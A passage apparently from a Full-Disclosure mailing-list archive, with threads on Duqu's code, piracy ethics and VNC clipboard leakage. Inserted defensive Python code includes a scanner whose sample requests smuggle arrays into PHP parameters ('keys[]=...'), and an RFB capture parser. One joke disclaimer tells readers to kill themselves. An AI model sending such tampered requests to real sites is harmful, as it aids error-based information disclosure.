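        if bracket and base and "]" in rest:
            shapes[base] = "array"
        else:
            shapes[name] = "scalar"
    # Later occurrences overwrite earlier ones, as in PHP.
    return shapes


def unexpected_arrays(url, scalar_params=EXPECTED_SCALARS):
    """Names from scalar_params that this request would deliver as arrays."""
    shapes = php_param_shapes(urlsplit(url).query)
    return sorted(p for p in scalar_params if shapes.get(p) == "array")


# The first two request lines come from the thread; the rest are constructed.
SAMPLE_REQUESTS = [
    "example.com/?q=search&keys[]=securitate.md",
    "https://dev.twitter.com/search/apachesolr_search/api?page[]=123",
    "/?q=search&keys%5B%5D=x",
    "/?q=search&keys=drupal",
    "/?keys[]=a&keys=b",
]


def scan(requests=SAMPLE_REQUESTS):
    """Map each request that needs attention to the offending parameter names."""
    findings = {}
    for url in requests:
        bad = unexpected_arrays(url)
        if bad:
            findings[url] = bad
    return findings


if __name__ == "__main__":
    for url, bad in scan().items():
        print(f"array where scalar expected {bad}: {url}")
```

Rejecting or casting such parameters before they reach string functions removes the warning at its source, independent of the `display_errors` setting the vendor response relies on.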
Re: [Full-disclosure] The Mystery of the Duqu Framework
At this point, I think someone (possibly the guys at securelist) ought to define 'new programming language'. By new I take it the writers would have created their own language. While far from impossible, it's quite improbable. It's possible someone out there decided something can't be achieved in any language, and thus have created their own.

On the other hand, by 'new' it seems many people seem to relate to 'unconventional languages' as well. There are many languages out there, some are far from anything related to C++ (as much as the C++ fanboys want us not to believe). So the mere speculation that it looks like 1% C++ here and there simply hinders actual serious investigation.

I can think of at least 3 different languages not mentioned on securelist nor on FD. I didn't suggest any of them simply because I don't know what they generate (I'm not proficient in either of them) but I do know they do not rely on any C++ compiler.

2012/3/11 Sanguinarious Rose sanguiner...@occultusterra.com

Do you have any suggestions as to what C++ compiler could generate such code in such a case and how one could generate similar code that matches the decompiled parts? Granted their theory of a new language is moonbatty but I think they have the knowledge to recognize a common compiler.

As for ctor and dtor, I am pretty sure they were marked by the researcher doing the decompiling or the decompiler and no such symbol names are in the executable. I would conclude as such for the other symbols named due to how they were named.

I do agree on the new language being possibly the dumbest insane moonbat speculation of the year however I have heard a few other things that win over that hands down ;)

On Sat, Mar 10, 2012 at 1:16 PM, William Pitcock neno...@systeminplace.net wrote:

On 3/10/2012 9:00 AM, 夜神 岩男 wrote:

On 03/10/2012 03:51 AM, f...@deserted.net wrote:

http://www.securelist.com/en/blog/667/The_Mystery_of_the_Duqu_Framework

Haven't seen this (or much discussion around this) here yet, so I figured I'd share.

From the description, it looks like someone pushed some code from a Lisp[1] variant (like Common Lisp, which is preprocessed into ANSI C by GCL, for example, before compilation) into a C++ DLL. Normal in the deeper end of Linux dev or Hurd communities, but definitely not standard practice in any established industry that makes use of Windows.

I could be wrong, I didn't take the time to walk myself through the decompile with any thoroughness and compare it to code I generate. Anyway, I have no idea the differences between how VC++ and g++ do things -- so my analysis would probably be trash. But from the way Mr. Soumenkov describes things it seems this, or something similar, could be the case and why the code doesn't conform to what's expected in a C++ binary.

LISP would refer to specific constructor/destructor vtable entries as cons and there would be no destructor at all. The structs use vtables which refer to ctor and dtor, which indicates that the vtables were most likely generated using a C++ compiler (since that is standard nomenclature for C++ compiler symbols).

It pretty much has to be Microsoft COM. The struct layouts pretty much *reek* of Microsoft COM when used with a detached vtable (such as if the implementation is loaded from a COM object file). The fact that specific vtable entries aren't mangled is also strong evidence of it being Microsoft COM (since there is no need to mangle vtable entries of a COM object due to type information already being known in the COM object).

If it looks like COM, smells like COM, and acts like COM, then it's probably COM. It certainly isn't some new programming language like Kaspersky says. That's just the dumbest thing I've heard this year.

William
Re: [Full-disclosure] Anon war?- arrests
Go back to your elite hacker club anonops then. Come back with something real these kids have done... other than trolling.
Re: [Full-disclosure] Anon war?- arrests
And we'd like to add that we are not crooks. - Anonymous.
Re: [Full-disclosure] hackers.it disappeared from google search results
Must have been Anonymous fooling around with Google.

On Thu, Feb 2, 2012 at 11:42 AM, Milan Berger m.ber...@project-mindstorm.net wrote:

Since few days my domain is out for first tests ..but today it is totally disappeared from Google search results. Do you know how this can happen? It has no malwares, exploits or anything illegal and there is neither the intent as you can read in the few pages. the domain is hackers.it Any help in understanding would be appreciated.

google site:hackers.it gives me:

| hackers.it | Information Security Magazine
| www.hackers.it/ - Diese Seite übersetzen
2011 www.hackers.it - All rights reserved.

So not really purged :)
Re: [Full-disclosure] when did piracy/theft become expression of freedom
No, it follows the fact that vengeance (the fuck you Byron mentioned) isn't fruitful to remedy the situation.

On Mon, Jan 30, 2012 at 8:54 AM, Mike Hale eyeronic.des...@gmail.com wrote:

What you said doesn't follow. Making a digital copy isn't burning down a business. The analogy linking 'piracy' with theft is ludicrous.

On Sun, Jan 29, 2012 at 11:50 PM, Christian Sciberras uuf6...@gmail.com wrote:

Byron, you don't protest to the government by burning down 100-year-old business, if you know what I mean...

On Mon, Jan 30, 2012 at 12:12 AM, Byron L. Sonne byron.so...@gmail.com wrote:

The thing that makes me laugh about all of this, and one of the key things I learned from reading Gibbon's Decline & Fall is this: The number and frequency of laws passed regarding things directly relates to how widespread these things are, and how much the laws are ignored and ineffective. Laws can't prevent a damn thing, they can only specify remedies. As it is said, it's only illegal if you get caught.

The cat is out of the bag and will never be put back in. There's no way to stop people from 'illegally' copying copyrighted material.

If they somehow managed to require and implement tech so that perfect digital copies can't be made (unlikely) then people will simply use a camera to record the video as it plays on the screen. Hey, wait a minute, that sounds just like that screener I downloaded someone taped in Russia! ;)

If they manage to require and implement tech so that you can't trade it over the internet (unlikely) then people will simply trade it on private networks or, like we used to do in the old days, via sneakernet.

The problem is that in an attempt to control the dissemination of copyrighted material (and people are right, artists do have a right to reap the benefits of their effort) the powers-that-be are stepping over the line and into territory that impacts our ability to communicate in the fashion we choose. It might be fine to try and prevent piracy but in the process of doing so you are trashing the other desires of people that have nothing to do with piracy.

I'm sure if the copyright lobby had their way, they'd require us to wear special glasses in order to see our laptop screens, on the assumption that anything not explicitly licensed was assumed to be unlicensed, and thus pirated, which we would be blocked from our field of view... and as a result, some girl/guy who wants to write a simple freeware text editor now has to jump through regulatory hoops and spend money to obtain a special registration that allows their text editor to display to the screen. This is a cheesy example, but I think it makes the point.

In the guise of 'protecting artists and businesses' what is happening is that the powers-that-be are requesting (and too often getting) powers that allow them to trample on the general idea of freedom of communications and other things people cherish. As a result, people are inclined to engage in the very behaviours that elicited the laws and crackdowns, quite simply, as a way to raise their middle finger and say Fuck You.

This is when piracy and theft becomes freedom of expression - when it's done in protest.

-- http://www.freebyron.org

-- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Uhm, that was a ridiculous situation anyway (@illegal primes). So lets leave it at 'not necessarily'.

On Mon, Jan 30, 2012 at 9:08 AM, Mike Hale eyeronic.des...@gmail.com wrote:

Not necessarily. Look at the effects of people posting DeCSS and the HDDVD keys a while back. The industry ended up giving in precisely because people said, en masse, fuck off.

On Mon, Jan 30, 2012 at 12:05 AM, Christian Sciberras uuf6...@gmail.com wrote:

No, it follows the fact that vengeance (the fuck you Byron mentioned) isn't fruitful to remedy the situation.

On Mon, Jan 30, 2012 at 8:54 AM, Mike Hale eyeronic.des...@gmail.com wrote:

What you said doesn't follow. Making a digital copy isn't burning down a business. The analogy linking 'piracy' with theft is ludicrous.

On Sun, Jan 29, 2012 at 11:50 PM, Christian Sciberras uuf6...@gmail.com wrote:

Byron, you don't protest to the government by burning down 100-year-old business, if you know what I mean...

On Mon, Jan 30, 2012 at 12:12 AM, Byron L. Sonne byron.so...@gmail.com wrote:

The thing that makes me laugh about all of this, and one of the key things I learned from reading Gibbon's Decline & Fall is this: The number and frequency of laws passed regarding things directly relates to how widespread these things are, and how much the laws are ignored and ineffective. Laws can't prevent a damn thing, they can only specify remedies. As it is said, it's only illegal if you get caught.

The cat is out of the bag and will never be put back in. There's no way to stop people from 'illegally' copying copyrighted material.

If they somehow managed to require and implement tech so that perfect digital copies can't be made (unlikely) then people will simply use a camera to record the video as it plays on the screen. Hey, wait a minute, that sounds just like that screener I downloaded someone taped in Russia! ;)

If they manage to require and implement tech so that you can't trade it over the internet (unlikely) then people will simply trade it on private networks or, like we used to do in the old days, via sneakernet.

The problem is that in an attempt to control the dissemination of copyrighted material (and people are right, artists do have a right to reap the benefits of their effort) the powers-that-be are stepping over the line and into territory that impacts our ability to communicate in the fashion we choose. It might be fine to try and prevent piracy but in the process of doing so you are trashing the other desires of people that have nothing to do with piracy.

I'm sure if the copyright lobby had their way, they'd require us to wear special glasses in order to see our laptop screens, on the assumption that anything not explicitly licensed was assumed to be unlicensed, and thus pirated, which we would be blocked from our field of view... and as a result, some girl/guy who wants to write a simple freeware text editor now has to jump through regulatory hoops and spend money to obtain a special registration that allows their text editor to display to the screen. This is a cheesy example, but I think it makes the point.

In the guise of 'protecting artists and businesses' what is happening is that the powers-that-be are requesting (and too often getting) powers that allow them to trample on the general idea of freedom of communications and other things people cherish. As a result, people are inclined to engage in the very behaviours that elicited the laws and crackdowns, quite simply, as a way to raise their middle finger and say Fuck You.

This is when piracy and theft becomes freedom of expression - when it's done in protest.

-- http://www.freebyron.org

-- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0

-- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Byron, you don't protest to the government by burning down 100-year-old business, if you know what I mean...

On Mon, Jan 30, 2012 at 12:12 AM, Byron L. Sonne byron.so...@gmail.com wrote:

The thing that makes me laugh about all of this, and one of the key things I learned from reading Gibbon's Decline & Fall is this: The number and frequency of laws passed regarding things directly relates to how widespread these things are, and how much the laws are ignored and ineffective. Laws can't prevent a damn thing, they can only specify remedies. As it is said, it's only illegal if you get caught.

The cat is out of the bag and will never be put back in. There's no way to stop people from 'illegally' copying copyrighted material.

If they somehow managed to require and implement tech so that perfect digital copies can't be made (unlikely) then people will simply use a camera to record the video as it plays on the screen. Hey, wait a minute, that sounds just like that screener I downloaded someone taped in Russia! ;)

If they manage to require and implement tech so that you can't trade it over the internet (unlikely) then people will simply trade it on private networks or, like we used to do in the old days, via sneakernet.

The problem is that in an attempt to control the dissemination of copyrighted material (and people are right, artists do have a right to reap the benefits of their effort) the powers-that-be are stepping over the line and into territory that impacts our ability to communicate in the fashion we choose. It might be fine to try and prevent piracy but in the process of doing so you are trashing the other desires of people that have nothing to do with piracy.

I'm sure if the copyright lobby had their way, they'd require us to wear special glasses in order to see our laptop screens, on the assumption that anything not explicitly licensed was assumed to be unlicensed, and thus pirated, which we would be blocked from our field of view... and as a result, some girl/guy who wants to write a simple freeware text editor now has to jump through regulatory hoops and spend money to obtain a special registration that allows their text editor to display to the screen. This is a cheesy example, but I think it makes the point.

In the guise of 'protecting artists and businesses' what is happening is that the powers-that-be are requesting (and too often getting) powers that allow them to trample on the general idea of freedom of communications and other things people cherish. As a result, people are inclined to engage in the very behaviours that elicited the laws and crackdowns, quite simply, as a way to raise their middle finger and say Fuck You.

This is when piracy and theft becomes freedom of expression - when it's done in protest.

-- http://www.freebyron.org
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Sadly you can't download routers and internet connections...especially without an internet connection. But I suppose you could be the regular joe and steal from your neighbours' bandwidth (it's a human right, remember? your neighbour doesn't have a right to keep the internets to himself!!!). /rant

On Sat, Jan 28, 2012 at 10:33 PM, Laurelai laure...@oneechan.org wrote:

On 1/28/2012 3:13 PM, Julius Kivimäki wrote:

Of course I wouldn't, downloading a car would be like stealing a car. Piracy is horrible and all the boats used by the pirate scum should be taken away.

2012/1/28 Laurelai laure...@oneechan.org

On this topic I saw this https://thepiratebay.org/torrent/6960965/1970_Chevelle_Hot-Rod_3d_model , real question is would you download a car if you could?

If you took away their boats they would just download more...duh.
Re: [Full-disclosure] when did piracy/theft become expression of freedom
That has always been viewed from the consumer perspective. If you look at it from the producers' perspective, you'll see their right to withhold their creative content until you pay something back. While the terminology is not correct, it doesn't mean you can abuse it and expect people to waste time for you.

Another thing to note, if artists, software companies etc were so nice to actually want to give all this stuff for free, I'm pretty sure no one is forcing them to sell their content. So don't talk about the they're not losing anything bullshit to me.

Laurelai - Yes, I'm sure McDonalds have acknowledged your human right to a free internet connection. Next thing they'll be feeding you for free as well

On Sat, Jan 28, 2012 at 11:26 PM, valdis.kletni...@vt.edu wrote:

On Fri, 27 Jan 2012 19:02:09 PST, Zach C. said:

If you buy an album used, the seller generally loses possession of it, you gain possession of it at a reduced cost, and the original purchase still gave the original seller and producer value.

Note that if I shoplift a CD that sucks and isn't worth the $14.99 sticker price, I have deprived the producer of the ability to sell it to somebody else. That's the crucial point that underlies our social concept of theft - if I take it from you, you don't have it anymore.

If I copy an album that isn't worth the sticker price, and which I would not have purchased at that price, two things of note happen:

1) As much as the labels wish it were so, they can't count that as lost revenue because it wouldn't have accrued to them anyhow, any more than a car dealership can legitimately call it lost revenue if I walk onto their lot, tell the salescritter they're crazy if they think I'll pay $28K for a given car, and walk off the lot. (Now, if they want to count the Damn, we lost the $4.99 that guy *would* have paid if we charged that instead of $14.99, they're welcome to that. :)

2) More importantly, they still have the original bits and are free to look for other suckers who *will* pay $14.99.

For the record, all my media is legitimately acquired, though a large portion *was* obtained used and if the producers don't like that, they're welcome to go re-read first sale doctrine ;)

Just trying to make people actually engage their neurons - this stuff is *not* easy to sort out, because intellectual property and digital information do *not* behave the same as cars and cows in the physical world, and unintended consequences of policy decisions are all *over* the place. (DMCA anti-circumvention clause prohibiting me from fair-use accessing my own media, I'm looking at you. :)
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Copyrights exist for consumers, at least according to the US constitution: snip
And? I'm talking about the simple fact that the producer has the right to earn money from his creation. Copyright is just a tool.
Copyrights do not exist for the benefit of producers; that is only a means to an end. The point of the copyright system is to benefit the general public.
Exactly.
So, in your own words, producers are at a loss. ...which is not the same as their right to prevent you from making copies of their work.
Oh come on. Who are you trying to feed that to? You know damn well current court cases target 'copyright infringement' for non-personal use such as copying such material and selling it for profit.
Why don't you just admit many people out there are afraid of losing their little racket?
Then tell me what they lost. Can you prove that someone who downloaded a song would have spent money on the song if it had not been available for download? The argument that losses are incurred for every download has always been baseless and always will be.
Can you prove that a company/group can live on by handing out free copies of their song on the internet? How many companies out there do that?
Industries need to adapt to the times, or else they die. What makes recording, movie production, etc. so special?
Let's turn this to a different parallel issue, open source. Last I checked, income for opensource projects tend to come from one of the following:
- advertisements
- paid support
- training
How many such activities play well with records companies?
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Actually, *most* bands that make money do so off the concert tours - tickets and tshirts is where the actual money is at, not the album sales. So why bother with album sales in the first place? This is the same with free/commercial software. At the end of the day the creator decides the sales strategy. The only thing I can see in this is that the recording industry really needs to grow up to the times, but piracy is not a solution nor the means to one, just like DDoSing facebook is not the means to the removal of a certain bill/law (arguably, to the contrary). The recording companies have every right to retaliate just as the FBI has every right to arrest suspects involved in these childish acts.
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
That's not necessarily true. On Windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info.
Chris.
On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote:
I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them.
On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
On 01/24/2012 07:18 PM, Mario Vilas wrote:
Guys, could you please read carefully everything before you reply?
I read carefully. It still didn't make sense, though.
And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess?
I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
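The question argued in this thread, whether clipboard text reaches the server at copy or connect time rather than at paste time, can be checked on a capture. The following is an added example, not code from any poster: it walks an unencrypted, post-handshake RFB client-to-server byte stream (message layouts as in RFC 6143) and reports each ClientCutText message together with the number of key or pointer events sent before it. The sample stream and all function names are constructed for illustration.

```python
import struct

# Sizes in bytes (type byte included) of the fixed-length RFB
# client-to-server messages, per RFC 6143 section 7.5.
FIXED_SIZES = {
    0: 20,  # SetPixelFormat
    3: 10,  # FramebufferUpdateRequest
    4: 8,   # KeyEvent
    5: 6,   # PointerEvent
}
SET_ENCODINGS = 2
CLIENT_CUT_TEXT = 6
USER_INPUT_TYPES = (4, 5)


class TruncatedStream(ValueError):
    """The capture ends in the middle of a message."""


def require(stream, offset, count):
    # Length fields come from the wire, so bounds-check before slicing.
    if offset + count > len(stream):
        raise TruncatedStream(f"need {count} bytes at offset {offset}")


def find_clipboard_transfers(stream):
    """List every ClientCutText message in a client-to-server RFB stream.

    Each finding records the byte offset, the clipboard text, and how many
    key/pointer events the client had sent before it. A count of zero means
    the text left the viewer before the user touched the remote desktop.
    """
    findings = []
    input_events = 0
    offset = 0
    while offset < len(stream):
        msg_type = stream[offset]
        if msg_type in FIXED_SIZES:
            size = FIXED_SIZES[msg_type]
            require(stream, offset, size)
            if msg_type in USER_INPUT_TYPES:
                input_events += 1
        elif msg_type == SET_ENCODINGS:
            require(stream, offset, 4)
            (count,) = struct.unpack_from(">H", stream, offset + 2)
            size = 4 + 4 * count
            require(stream, offset, size)
        elif msg_type == CLIENT_CUT_TEXT:
            require(stream, offset, 8)
            (length,) = struct.unpack_from(">I", stream, offset + 4)
            size = 8 + length
            require(stream, offset, size)
            text = stream[offset + 8:offset + size].decode("latin-1")
            findings.append({"offset": offset, "text": text,
                             "input_events_before": input_events})
        else:
            # Vendor extensions use other type codes; stop rather than
            # guess their length and desynchronise.
            raise ValueError(f"unknown message type {msg_type} at {offset}")
        offset += size
    return findings


def cut_text(data):
    # type 6, three padding bytes, U32 length, then the text itself
    return struct.pack(">B3xI", CLIENT_CUT_TEXT, len(data)) + data


def build_sample_stream():
    """Constructed capture: setup, clipboard push, user input, second copy."""
    return b"".join([
        struct.pack(">B3x16s", 0, bytes(16)),           # SetPixelFormat
        struct.pack(">BxHii", SET_ENCODINGS, 2, 0, 1),  # SetEncodings: Raw, CopyRect
        struct.pack(">BBHHHH", 3, 0, 0, 0, 800, 600),   # FramebufferUpdateRequest
        cut_text(b"constructed-secret-from-local-clipboard"),
        struct.pack(">BBHH", 5, 0, 10, 20),             # PointerEvent
        struct.pack(">BBxxI", 4, 1, 0x61),              # KeyEvent, 'a' pressed
        cut_text(b"copied later"),
    ])


if __name__ == "__main__":
    for finding in find_clipboard_transfers(build_sample_stream()):
        print(finding)
```

A finding with `input_events_before` equal to 0 is the case the report is about: the viewer pushed local clipboard text before any interaction with the remote session.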
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
No, I only read the manual. Now go troll somewhere else. :)
On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote:
Windows is even more secure, have you actually, read any of the code /
On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote:
That's not necessarily true. On Windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info.
Chris.
On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote:
I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them.
On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
On 01/24/2012 07:18 PM, Mario Vilas wrote:
Guys, could you please read carefully everything before you reply?
I read carefully. It still didn't make sense, though.
And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess?
I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
For the record... who are the other 'many on this list' that know you don't troll other than your alter egos? 'course you don't troll can you quote me where I ever said VNC is secure? With that, I'll let you troll in peace. I have no interest talking to you anyway... :)
On Wed, Jan 25, 2012 at 12:04 PM, GloW - XD doo...@gmail.com wrote:
and stupidly, you forgot to add in the second PRIVT post i sent you, saying i meant *insecure :) now, go try tell me windows vnc is secure again...and, then setup a vnc on your box, and, under win32, try your best, when you're ready, yell out, so i can make a complete fucking fool of ya. ok ? if this is how you want to play, i am challenging you, if i can own a shitty windows setup you 'secure' as best you can, here on fd, is this trolling is it ? it's a challenge... maybe, if you read the lame rfb and, pixelisation via IP KVM, unfortunately for windows, it ain't any different, a pixel is placed at X or Y, and, you can place data calls to it, from server which, could be, my bot :) want more proof,...keep going with my challenge then.
On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote:
No, I only read the manual. Now go troll somewhere else. :)
On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote:
Windows is even more secure, have you actually, read any of the code /
On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote:
That's not necessarily true. On Windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info.
Chris.
On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote:
I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them.
On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote:
On 01/24/2012 07:18 PM, Mario Vilas wrote:
Guys, could you please read carefully everything before you reply?
I read carefully. It still didn't make sense, though.
And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess?
I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged.
I don't think that is what Ben is saying. The clipboard gets sent to the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So whatever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a clipboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report makes complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =)
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] OT: Firefox question / poll
Both?
On Tue, Dec 20, 2011 at 6:40 PM, Charles Morris cmor...@cs.odu.edu wrote:
I'm curious what everyone's opinion is on the following question... esp. to any FF dev people on list: Do you think that the Firefox "warning: unresponsive script" is meant as a security feature or a usability feature?
Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
Because it's bugtraq / full-disclosure, where people generally talk about vulnerabilities...
Sure thing. Complaining about patches that don't do anything http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html is a plus to your reputation, I guess, right? Finding tangible solutions to your problems means that eventually you'll lose the job.
I'm not sure I follow your drift about Firefox, I don't believe it's mentioned anywhere.
Indeed, you didn't mention Firefox. Someone else did.
Why?
It's harder to predict how much it would take for a page to load, as well as your caching concept will fail when the target in question can only be invoked by the user. Also, there's the situation where a simple click won't get you anywhere, for instance, in cases where a user has to enter his credentials as well as to confirm the action.
Chris.
[Full-disclosure] OMIGOD CIQ HACKING THE WORLD.
Or not... http://vulnfactory.org/blog/2011/12/05/carrieriq-the-real-story/
On the other hand, where's that l33t hacker Drew (aka xD 0x41)? Thought he'd enlighten us with more of his awesome hacking powers on this issue.
Re: [Full-disclosure] OMIGOD CIQ HACKING THE WORLD.
Uhm, pretty much any software entering your system has some potential to (being) wreak(ing) havoc, be whether it is an innocent gif file or a potentially backdoored exe. Still, that doesn't give me the right to shout at any software vendor baseless assumptions that simply damages its reputation. Think about it, if this software is in fact what they say it does (and does it pretty well) who's winning? The EFF guys? The genius that came up with the media scam? How many really good alternatives to it are there? Can we really blame the company for keeping its concepts secret (consider the amount of alternative software crap out there).
But that's just my insignificant opinion, nothing to look at, keep on going. Meanwhile, as I promised someone, I'll do an occasional troll for the lulz*.
*Hey, at least I don't crack servers en masse under soviet direction to get on with cocaine addiction :).
With that said, I won't say another thing on this thread. If anyone feels compelled to keep any of this going, you know my personal email address.
Re: [Full-disclosure] NEVER AGAIN
James, could you please stop publishing emails intended for private use? It's getting plain ridiculous the amount of crap from this list I (and the rest) have to deal with every day.
On Tue, Nov 22, 2011 at 3:06 PM, James Rankin kz2...@googlemail.com wrote:
Whatever
On 22 November 2011 14:05, andrew.wallace andrew.wall...@rocketmail.com wrote:
The email is nothing to do with me or my consultancy. You need better analysis skills and a good lawyer.
--- Andrew Wallace
--
From: James Rankin kz2...@googlemail.com
To: andrew.wallace andrew.wall...@rocketmail.com
Cc: Darren Martyn d.martyn.fulldisclos...@gmail.com; Antony widmal antony.wid...@gmail.com; xD 0x41 sec...@gmail.com; Martin Allert all...@arago.de; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk; phocean 0...@phocean.net; Nikolay Kichukov hijac...@oldum.net; valdis.kletni...@vt.edu valdis.kletni...@vt.edu
Sent: Tuesday, November 22, 2011 2:01 PM
Subject: Re: [Full-disclosure] NEVER AGAIN
Strange. Your other personality said much the same thing.
On 22 November 2011 13:57, andrew.wallace andrew.wall...@rocketmail.com wrote:
You're making the worst mistake possible for yourself.
--- Andrew Wallace
--
From: James Rankin kz2...@googlemail.com
To: andrew.wallace andrew.wall...@rocketmail.com
Cc: Darren Martyn d.martyn.fulldisclos...@gmail.com; Antony widmal antony.wid...@gmail.com; Martin Allert all...@arago.de; full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk; phocean 0...@phocean.net; Nikolay Kichukov hijac...@oldum.net; valdis.kletni...@vt.edu valdis.kletni...@vt.edu
Sent: Tuesday, November 22, 2011 1:51 PM
Subject: Re: [Full-disclosure] NEVER AGAIN
Consultancy. Hehe. You seriously need treatment for schizophrenia. Why don't you go and argue with your alter ego? Please tell your solicitor he is welcome to talk to mine any day.
Regards, JR
On 22 November 2011 13:48, andrew.wallace andrew.wall...@rocketmail.com wrote:
I think you are mistaken, this email is not sent by my consultancy. I ask you to retract your statement or face legal action.
--- Andrew Wallace
Independent consultant
https://plus.google.com/115085501867247270932/about
-- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question.
IMPORTANT INFORMATION/DISCLAIMER
This document should be read only by those persons to whom it is addressed. If you have received this message it was obviously addressed to you and therefore you can read it, even if we didn't mean to send it to you. However, if the contents of this email make no sense whatsoever then you probably were not the intended recipient, or, alternatively, you are a mindless cretin; either way, you should immediately kill yourself and destroy your computer (not necessarily in that order). Once you have taken this action, please contact us.. no, sorry, you can't use your computer, because you just destroyed it, and possibly also committed suicide afterwards, but I am starting to digress..
